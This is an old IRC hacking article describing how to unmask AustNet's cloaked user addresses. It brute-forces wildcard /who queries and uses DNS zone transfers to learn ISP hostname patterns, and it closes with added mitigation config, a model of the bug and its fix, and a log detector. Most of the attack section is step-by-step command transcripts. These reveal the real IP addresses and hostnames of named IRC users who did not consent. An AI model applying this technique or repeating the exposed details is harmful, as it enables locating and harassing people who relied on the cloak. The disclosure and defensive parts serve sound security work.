IRCHelper.co.uk

Hacking AustNet's Virtual Worlds
by Dogcow

The following text explains how the Virtual World protection used on the IRC servers can be hacked :((

Reference Links:
* AustNet (http://www.austnet.org/)
* AustNet Virtual Worlds (http://www.austnet.org/virtualworld/index.html)
* An automated hack in Perl by cyrax (http://www.2600.org.au/austip.pl)

Some background info:

AustNet's Virtual World service cloaks a user's IP address by means of an individually allocated "Virtual World Account", which replaces part of the user's hostname if it reverse resolves to a name, or the last two octets of the IP address if it does not. This state corresponds to a user having mode +v set on their IRC client. Mode +v is set by default when a user connects to the AustNet IRC Network. Unless the user deliberately sets mode -v, or initiates or accepts a DCC connection from another user, all transactions are masked using this information. Examples of these masked hostnames include:

*** Dogcow has IP number: vw-7714.2600.org.au (actual hostname is 2600.org.au)
*** Dogcow has IP number: 203.15.198.9086 (actual address is 203.15.94.143)

The Hack:

The hack consists of a brute force lookup using a /who query. The /who query on AustNet, while returning masked information, is actually matched against the real, unmasked addresses. Having said this, I should split the explanation of the methods into two separate parts, because an IP address query can take less than 30 seconds and requires no external lookup information, while a hostname based query requires information on the host naming pattern used by the ISP. The only final caveat is that you need to be on the same channel as the user you are tracking down, or they need to be user mode -i (not set by default).

IP address queries:

Here is a query on a friend of mine...

*** ^KaRaG^ is NiNjaH@203.15.198.9092 (?)

Note the masked IP address here. The only real part is the 203.15.
The rest is fake, and hence this is the part we need to guess.

*** ^KaRaG^ is on channels #conspiracy
*** ^KaRaG^ is on IRC via server iinet.wa.au.austnet.org (iiNet Technologies AustNet IRC, WA)

Here is the result of my first query:

/who 203.15.1*
*** 203.15.1* :End of /WHO list.

And so on...

/who 203.15.2*
*** 203.15.2* :End of /WHO list.
*** 203.15.3* :End of /WHO list.
*** 203.15.4* :End of /WHO list.
*** 203.15.5* :End of /WHO list.
*** 203.15.6* :End of /WHO list.
*** 203.15.7* :End of /WHO list.
*** 203.15.8* :End of /WHO list.
#conspiracy ^KaRaG^ Hv 1 NiNjaH@203.15.198.9092 ?
*** 203.15.9* :End of /WHO list.

Now, we have a hit. The thing to remember is not to look at the "NiNjaH@203.15.198.9092 ?" bit, but that we got a hit when we queried 203.15.9*. This is where most people seem to get lost. Just remember that /who doesn't return live information - it returns masked information based on a live query. Having gotten a hit on 203.15.9*, we now iterate through the rest of the numbers. Remember - we don't care what the match says - it's the fact we get a match on our target at all!

Here is the result of my next query:

/who 203.15.90*
*** 203.15.90* :End of /WHO list.
*** 203.15.91* :End of /WHO list.
*** 203.15.92* :End of /WHO list.
*** 203.15.93* :End of /WHO list.
#conspiracy ^KaRaG^ Hv 1 NiNjaH@203.15.198.9092 ?
*** 203.15.94* :End of /WHO list.

We've now had another hit, this time on /who 203.15.94*. Given that we can't have a number higher than 255 in an IP address, we iterate to the next octet.

#conspiracy ^KaRaG^ Hv 1 NiNjaH@203.15.198.9092 ?
*** 203.15.94.1* :End of /WHO list.

Now we start with /who 203.15.94.1* and we get a hit first time, so we then keep going, iterating on the next number.

*** 203.15.94.10* :End of /WHO list.
*** 203.15.94.11* :End of /WHO list.
*** 203.15.94.12* :End of /WHO list.
*** 203.15.94.13* :End of /WHO list.
#conspiracy ^KaRaG^ Hv 1 NiNjaH@203.15.198.9092 ?
*** 203.15.94.14* :End of /WHO list.
Bingo, we've now gotten a hit on /who 203.15.94.14* and hence keep going for the last number of the IP address. We're almost there.

*** 203.15.94.140* :End of /WHO list.
*** 203.15.94.141* :End of /WHO list.
*** 203.15.94.142* :End of /WHO list.
*** 203.15.94.143* :End of /WHO list.
*** 203.15.94.144* :End of /WHO list.
*** 203.15.94.145* :End of /WHO list.
*** 203.15.94.146* :End of /WHO list.
*** 203.15.94.147* :End of /WHO list.
*** 203.15.94.148* :End of /WHO list.
#conspiracy ^KaRaG^ Hv 1 NiNjaH@203.15.198.9092 ?
*** 203.15.94.149* :End of /WHO list.

Okay, done. Just a final query without the * to confirm:

/who 203.15.94.149
#conspiracy ^KaRaG^ Hv 1 NiNjaH@203.15.198.9092 ?
*** 203.15.94.149 :End of /WHO list.

Hostname based queries:

Put simply, this is where things get more difficult, and for two reasons. The first is that you need to know the host naming patterns for the ISP your targeted user is on, and the second is that most people (i.e. Windows users) won't have access to the tools that allow them to do abstract lookups or zone transfers from an ISP. In particular I am referring to a tool called dig, which is typically included on Unix-based operating systems like the *BSD ones and Linux.

Firstly we'll start with what I call an easy ISP. In this case I chose KaneToad from #2600.
First we start with a /whois query:

*** KaneToad is winblows@vw-13663.goulburn.net.au (dammn ure nosey arnt you)
*** KaneToad is on channels #2600
*** KaneToad is on IRC via server powerup.qld.au.austnet.org ([202.139.235.220] PowerUp Internet (07) 3249-2600)

Okay, so he's at goulburn.net.au. We start off with a simple enough nslookup query to find goulburn.net.au's name server address:

[root@spooks /root]# nslookup
Default Server: spooks.2600.org.au
Address: 203.25.224.26

> set q=ns
> goulburn.net.au
Server: spooks.2600.org.au
Address: 203.25.224.26

Non-authoritative answer:
goulburn.net.au nameserver = netspace.nspace.com.au
goulburn.net.au nameserver = moebius.goulburn.net.au

Authoritative answers can be found from:
moebius.goulburn.net.au internet address = 203.28.11.1
> exit

Now, we attempt to get a listing of every hostname from this ISP. This is called a zone transfer (AXFR) and is usually done at a user level with a program called dig. For a full zone transfer of goulburn.net.au, we use the following command:

[root@spooks /root]# dig @203.28.11.1 goulburn.net.au axfr in | more

In this case the "@203.28.11.1" just tells dig which nameserver in particular to query, the "goulburn.net.au axfr in" says we want a full zone transfer for goulburn.net.au, and the "| more" just means I'm piping the output through more. The output can also be piped through grep if you're after a specific pattern.

Keep in mind some smart ISPs (read: the better ones) have blocked AXFRs from their primary nameservers to anything but their specified secondary nameservers, so this doesn't always work. If it doesn't, jump onto another IRC network that doesn't offer masking at all and just check out some popular channels to see the patterns. It's obviously not as fast as this, but it works.

The first two screens of output from this command were:

; <<>> DiG 8.1 <<>> @203.28.11.1 goulburn.net.au axfr in
; (1 server found)
$ORIGIN goulburn.net.au.
@            1D IN SOA    moebius root.netspace.nspace.com.au. (
                          1999031700   ; serial
                          3H           ; refresh
                          1H           ; retry
                          1W           ; expiry
                          1D )         ; minimum
             1D IN NS     moebius
             1D IN NS     netspace.nspace.com.au.
             1D IN MX     10 moebius
             1D IN MX     20 netspace.nspace.com.au.
             1D IN A      203.28.11.1
www2         1D IN A      203.28.11.49
loghost      1D IN CNAME  localhost
localhost    1D IN A      127.0.0.1
news         1D IN CNAME  news.syd.connect.com.au.
b-frame      1D IN A      203.28.11.28
netspace     1D IN CNAME  netspace.nspace.com.au.
cantor       1D IN A      203.28.11.30
euclid       1D IN A      203.28.11.36
mail         1D IN CNAME  moebius
mailhost     1D IN CNAME  moebius
nexthop      1D IN A      203.63.118.62
library      1D IN A      203.28.11.118
council      1D IN A      203.28.11.20
max-01       1D IN A      203.28.11.34
guevara      1D IN A      203.28.11.40
godel        1D IN A      203.28.11.27
ppp001       1D IN A      203.28.11.101
ppp002       1D IN A      203.28.11.102
ppp003       1D IN A      203.28.11.103
ppp004       1D IN A      203.28.11.104
ppp005       1D IN A      203.28.11.105
ppp006       1D IN A      203.28.11.106
ppp007       1D IN A      203.28.11.107
ppp008       1D IN A      203.28.11.108
ppp010       1D IN A      203.28.11.110
ppp011       1D IN A      203.28.11.111
ppp009       1D IN A      203.28.11.109
ppp012       1D IN A      203.28.11.112
ppp013       1D IN A      203.28.11.113
ppp014       1D IN A      203.28.11.114
ppp015       1D IN A      203.28.11.115
ppp016       1D IN A      203.28.11.116
max-01-001   1D IN A      203.28.11.137
ppp017       1D IN A      203.28.11.117
max-01-002   1D IN A      203.28.11.138
ppp020       1D IN A      203.28.11.120
aleph        1D IN A      203.28.11.24
max-01-003   1D IN A      203.28.11.139
ppp021       1D IN A      203.28.11.121
ppp019       1D IN A      203.28.11.119
max-01-004   1D IN A      203.28.11.140
ppp022       1D IN A      203.28.11.122
max-01-005   1D IN A      203.28.11.141
ppp023       1D IN A      203.28.11.123
ts-01        1D IN A      203.28.11.33
max-01-006   1D IN A      203.28.11.142
ppp024       1D IN A      203.28.11.124
max-01-007   1D IN A      203.28.11.143
ppp025       1D IN A      203.28.11.125
euler        1D IN A      203.28.11.26

Now in that, we can see two distinct patterns for dialup users: the pppXXX.goulburn.net.au pattern and the max-XX-XXX.goulburn.net.au pattern. This is where we start our /who queries in much the same way as we did with the numeric addresses.
*** ppp*goulburn.net.au :End of /WHO list.

So there was no result on the first pattern we found. Let's now try the second.

#perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au
*** max*goulburn.net.au :End of /WHO list.

Bingo. Now let's start iterating the numbers.

#perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au
*** max-0*goulburn.net.au :End of /WHO list.

Okay, match on the zero. Let's keep going.

*** max-00*goulburn.net.au :End of /WHO list.
#perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au
*** max-01*goulburn.net.au :End of /WHO list.
#perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au
*** max-01-*goulburn.net.au :End of /WHO list.
#perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au
*** max-01-0*goulburn.net.au :End of /WHO list.
*** max-01-00*goulburn.net.au :End of /WHO list.
*** max-01-01*goulburn.net.au :End of /WHO list.
#perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au
*** max-01-02*goulburn.net.au :End of /WHO list.
*** max-01-020*goulburn.net.au :End of /WHO list.
*** max-01-021*goulburn.net.au :End of /WHO list.
*** max-01-022*goulburn.net.au :End of /WHO list.
*** max-01-023*goulburn.net.au :End of /WHO list.
*** max-01-024*goulburn.net.au :End of /WHO list.
*** max-01-025*goulburn.net.au :End of /WHO list.
*** max-01-026*goulburn.net.au :End of /WHO list.
*** max-01-027*goulburn.net.au :End of /WHO list.
*** max-01-028*goulburn.net.au :End of /WHO list.
#perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au
*** max-01-029*goulburn.net.au :End of /WHO list.

Okay, we're done. Now one last one to confirm.

#perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au
*** max-01-029.goulburn.net.au :End of /WHO list.

Confirmed.

Okay. That was an example of an easy ISP. In comparison, a large ISP may have many letter-based patterns which aren't located easily (or quickly) using a dig-style query. In this case you may need to brute force the pattern itself.
An example of this is Telstra BigPond, because they (quite sensibly) don't allow AXFR queries:

[root@spooks /root]# dig @139.134.2.2 tmns.net.au axfr in | more

; <<>> DiG 8.1 <<>> @139.134.2.2 tmns.net.au axfr in
; (1 server found)
;; Received 0 answers (0 records).
;; FROM: spooks.2600.org.au to SERVER: 139.134.2.2
;; WHEN: Sat Apr 3 11:58:45 1999

In this case we'll go on what we can find in webserver logs or on other IRC networks. Their patterns are generally something like the following:

cwip-t-XXXX-p-XXX-X.tmns.net.au
spip-a-XXX-pool-XX.tmns.net.au
ldip-t-XXX-p-XXX-XXX.tmns.net.au
peip-a-XXX-pool-XXX.tmns.net.au
bdip-t-XXX-p-XXX-XX.tmns.net.au
tvip-a-XXX-pool-XXX.tmns.net.au
cf-aXX-pool-X.tmns.net.au

In any case, as you can see, it's a little more difficult than goulburn.net.au. Let's start again with a /whois query:

*** narcan is ~root@vw-29153.tmns.net.au (root)
*** narcan is on channels @#2600
*** narcan is on IRC via server wantree.wa.au.austnet.org ([203.27.235.3] Wantree, Perth, AUSTNet Server)

Now let's start the guessing:

(3 non-matches deleted)
*** a*tmns.net.au :End of /WHO list.
(2 non-matches deleted)
*** b*tmns.net.au :End of /WHO list.
*** c*tmns.net.au :End of /WHO list.
*** d*tmns.net.au :End of /WHO list.
*** e*tmns.net.au :End of /WHO list.
*** f*tmns.net.au :End of /WHO list.
*** g*tmns.net.au :End of /WHO list.
*** h*tmns.net.au :End of /WHO list.
*** i*tmns.net.au :End of /WHO list.
*** j*tmns.net.au :End of /WHO list.
*** k*tmns.net.au :End of /WHO list.
*** l*tmns.net.au :End of /WHO list.
#teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** m*tmns.net.au :End of /WHO list.

Okay, we found narcan at m*.tmns.net.au. Since we have no idea what the 4 letter pattern is, let's keep guessing.

*** ma*tmns.net.au :End of /WHO list.
*** mb*tmns.net.au :End of /WHO list.
*** mc*tmns.net.au :End of /WHO list.
*** md*tmns.net.au :End of /WHO list.
*** me*tmns.net.au :End of /WHO list.
*** mf*tmns.net.au :End of /WHO list.
*** mg*tmns.net.au :End of /WHO list.
*** mh*tmns.net.au :End of /WHO list.
#teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** mi*tmns.net.au :End of /WHO list.

Bingo - mi*tmns.net.au

*** mi-*tmns.net.au :End of /WHO list.

Just checking it's not mi-*tmns.net.au - checking because it's quicker than brute forcing another 2 whole letters.

*** mi-t*tmns.net.au :End of /WHO list.
*** mi-a*tmns.net.au :End of /WHO list.

Straying off track for a sec - let's see if it's a mi*-t*tmns.net.au or mi*-a*tmns.net.au address...

*** mi*-t*tmns.net.au :End of /WHO list.
#teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** mi*-a*tmns.net.au :End of /WHO list.

Okay so it's mi*-a*tmns.net.au

*** mia*-a*tmns.net.au :End of /WHO list.
*** mib*-a*tmns.net.au :End of /WHO list.
*** mic*-a*tmns.net.au :End of /WHO list.
*** mid*-a*tmns.net.au :End of /WHO list.
*** mie*-a*tmns.net.au :End of /WHO list.
*** mif*-a*tmns.net.au :End of /WHO list.
*** mig*-a*tmns.net.au :End of /WHO list.
*** mih*-a*tmns.net.au :End of /WHO list.
#teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** mii*-a*tmns.net.au :End of /WHO list.

And now we move to the last letter...

*** miia-a*tmns.net.au :End of /WHO list.
*** miib-a*tmns.net.au :End of /WHO list.
*** miic-a*tmns.net.au :End of /WHO list.
*** miid-a*tmns.net.au :End of /WHO list.
*** miie-a*tmns.net.au :End of /WHO list.
*** miif-a*tmns.net.au :End of /WHO list.
*** miig-a*tmns.net.au :End of /WHO list.
*** miih-a*tmns.net.au :End of /WHO list.
*** miii-a*tmns.net.au :End of /WHO list.
*** miij-a*tmns.net.au :End of /WHO list.
*** miik-a*tmns.net.au :End of /WHO list.
*** miil-a*tmns.net.au :End of /WHO list.
*** miim-a*tmns.net.au :End of /WHO list.
*** miin-a*tmns.net.au :End of /WHO list.
*** miio-a*tmns.net.au :End of /WHO list.
#teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** miip-a*tmns.net.au :End of /WHO list.

Okay so it's miip-a*tmns.net.au - onto the numbers...

#teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** miip-a-0*tmns.net.au :End of /WHO list.

It's pretty easy from here on in - just guessing numbers...

#teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** miip-a-00*tmns.net.au :End of /WHO list.
*** miip-a-001*tmns.net.au :End of /WHO list.
#teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** miip-a-002*tmns.net.au :End of /WHO list.
#teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** miip-a-002-p*tmns.net.au :End of /WHO list.
#teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** miip-a-002-pool*tmns.net.au :End of /WHO list.

We try the "pool" bit first so we don't waste time. If there's no match on pool, go back to "p-".

*** miip-a-002-pool-0*tmns.net.au :End of /WHO list.
*** miip-a-002-pool-1*tmns.net.au :End of /WHO list.
#teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** miip-a-002-pool-2*tmns.net.au :End of /WHO list.
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** miip-a-002-pool-20*tmns.net.au :End of /WHO list.
*** miip-a-002-pool-20.tmns.net.au :End of /WHO list.
*** miip-a-002-pool-200.tmns.net.au :End of /WHO list.
*** miip-a-002-pool-201.tmns.net.au :End of /WHO list.
*** miip-a-002-pool-202.tmns.net.au :End of /WHO list.
*** miip-a-002-pool-203.tmns.net.au :End of /WHO list.
#2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root
*** miip-a-002-pool-204.tmns.net.au :End of /WHO list.

The last query there shows the target hostname.
Time for a final nslookup:

[root@spooks /root]# nslookup miip-a-002-pool-204.tmns.net.au
Server: spooks.2600.org.au
Address: 203.25.224.26

Name: miip-a-002-pool-204.tmns.net.au
Address: 139.134.215.204

As you can see, the process for a longer hostname with a relatively smart ISP is quite a bit longer. This lookup took me just on two minutes.

Lookup avoidance:

Without going into detail about what this information, once found, can be used for, the obvious means of avoidance is to hide in plain sight and set yourself mode +i. The other way is simply to get yourself an operating system that doesn't care what other people might do to it and set yourself mode -v, making it somewhat of a non-event to look you up. At an ISP level, they can prevent people from getting a zone transfer by setting the "allow-transfer" directive in named.conf to the address of their designated secondary nameservers if they are using BIND.

Conclusion:

As you have seen, hostname lookups on AustNet are certainly not brain surgery. In fact, they are laughably far from it. Having said this, other networks that offer hostname masking (such as xnet) do not suffer from the same bug. Given AustNet's reluctance to release the source code for their current IRCd from their own site, let alone their services at all, it's a perfect example of a closed source bug not being fixed due to either lack of resources or a covert agenda, allowing those with knowledge to subvert a public policy of universal user protection as is preached on their Virtual World web page.
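The "allow-transfer" mitigation mentioned under Lookup avoidance, as an added named.conf fragment that is not from the article; the zone name and the secondary's address 192.0.2.53 are placeholders, and the weak form is shown beside the hardened one.

```conf
// Weak: no allow-transfer statement, so (with the BIND defaults of the
// article's era) any client can run the dig AXFR shown above and list
// every dialup hostname in the zone.
zone "example-isp.net.au" {
    type master;
    file "example-isp.net.au.zone";
};

// Hardened: only the designated secondary may pull the zone; everyone
// else gets a refused transfer, as in the tmns.net.au attempt above.
zone "example-isp.net.au" {
    type master;
    file "example-isp.net.au.zone";
    allow-transfer { 192.0.2.53; };   // placeholder: secondary nameserver
};
```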
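The root cause described under "The Hack" is that the /who mask is tested against the real host while the masked host is what gets printed. The following is an added Python model of that rule beside the hardened one; it is not AustNet's ircd code (which was never released), and the User records, the "cloaked" flag and the real/masked pairs are constructed from the hosts quoted in the article.

```python
"""Model of the /who bug described under "The Hack", beside the fix.

Added example, not AustNet's ircd (never released): the user records and
match rules below are constructed from the hosts quoted in the article.
"""
from fnmatch import fnmatchcase


class User:
    """One client: the host the server resolved and the host it displays."""

    def __init__(self, nick, real_host, masked_host, cloaked=True):
        self.nick = nick
        self.real_host = real_host      # resolved on connect, hidden when +v
        self.masked_host = masked_host  # the Virtual World replacement
        self.cloaked = cloaked          # umode +v (True) or -v (False)

    def shown_host(self):
        """What /whois, /who and channel lists are allowed to print."""
        return self.masked_host if self.cloaked else self.real_host


def irc_match(mask, value):
    """IRC masks use * and ? and compare case-insensitively."""
    return fnmatchcase(value.lower(), mask.lower())


def who_leaky(mask, users):
    """The behaviour the article demonstrates: the mask is tested against the
    real host while the masked host is what gets printed, so a hit on
    '203.15.94.1*' confirms the real address even though the output shows
    the fake one."""
    return [u.shown_host() for u in users if irc_match(mask, u.real_host)]


def who_fixed(mask, users):
    """Hardened rule: test the mask only against the host being shown. A +v
    user can then be found by their vw- name but never by the address hidden
    behind it; a -v user matches on their real host exactly as before."""
    return [u.shown_host() for u in users if irc_match(mask, u.shown_host())]


# Constructed sample population; real/masked pairs are those quoted above.
USERS = [
    User("^KaRaG^", "203.15.94.149", "203.15.198.9092"),
    User("KaneToad", "max-01-029.goulburn.net.au", "vw-13663.goulburn.net.au"),
    User("Dogcow", "2600.org.au", "vw-7714.2600.org.au", cloaked=False),
]

if __name__ == "__main__":
    for mask in ("203.15.94.1*", "203.15.198.*", "max-01-*goulburn.net.au"):
        print(f"{mask:26} leaky={who_leaky(mask, USERS)} fixed={who_fixed(mask, USERS)}")
```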
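From a server operator's side, the walkthroughs above have a recognisable shape: one client issuing many wildcard /who queries in quick succession, each literal prefix extending the last hit. The added example below (not from the article) flags that shape in a WHO log; the log format "<unix time> WHO <nick> <mask>", the thresholds and the sample lines are all constructed assumptions.

```python
"""Flag the /who brute force shape in server-side logs. Added example, not
from the article: the log format "<unix time> WHO <nick> <mask>" and the
thresholds are assumptions, and the sample log below is constructed."""
import re
from collections import defaultdict

LINE = re.compile(r"^(\d+) WHO (\S+) (\S+)$")
WINDOW = 60        # seconds of one requester's history examined together
MIN_QUERIES = 10   # a normal user issues one or two /who in that time
MIN_DEPTH = 4      # successive prefix refinements needed before alerting


def literal_prefix(mask):
    """Text before the first wildcard: '203.15.9*' -> '203.15.9'."""
    return re.split(r"[*?]", mask, maxsplit=1)[0].lower()


def refinement_depth(masks):
    """Longest chain in which each mask's literal prefix strictly extends an
    earlier one, e.g. 203.15.9 -> 203.15.94 -> 203.15.94.1 -> 203.15.94.14."""
    best = {}
    for mask in masks:
        p = literal_prefix(mask)
        parents = [d for q, d in best.items() if p.startswith(q) and p != q]
        best[p] = max(best.get(p, 0), 1 + max(parents, default=0))
    return max(best.values(), default=0)


def find_brute_forcers(lines):
    """Map nick -> (queries, depth) for requesters whose WHO traffic inside
    some WINDOW-second span is both high-volume and prefix-refining."""
    by_nick = defaultdict(list)
    for m in filter(None, (LINE.match(line.strip()) for line in lines)):
        by_nick[m.group(2)].append((int(m.group(1)), m.group(3)))
    flagged = {}
    for nick, events in by_nick.items():
        events.sort()
        for start, _ in events:
            window = [mask for ts, mask in events if start <= ts < start + WINDOW]
            depth = refinement_depth(window)
            if len(window) >= MIN_QUERIES and depth >= MIN_DEPTH:
                flagged[nick] = (len(window), depth)
                break
    return flagged


# Constructed sample: "snoop" replays the article's 203.15.* walk inside a
# minute; "alice" does two ordinary lookups in the same period.
WALK = ["203.15.%d*" % n for n in range(1, 10)] + ["203.15.9%d*" % n for n in range(5)]
WALK += ["203.15.94.1*", "203.15.94.10*", "203.15.94.14*", "203.15.94.149"]
SAMPLE_LOG = ["%d WHO snoop %s" % (900000000 + i, m) for i, m in enumerate(WALK)]
SAMPLE_LOG += ["900000005 WHO alice #conspiracy", "900000030 WHO alice *.goulburn.net.au"]

if __name__ == "__main__":
    print(find_brute_forcers(SAMPLE_LOG))  # {'snoop': (18, 5)}
```

The depth check is what separates the walk from a busy but legitimate client: volume alone also catches someone paging through a large channel, while a chain of refining prefixes is specific to this technique.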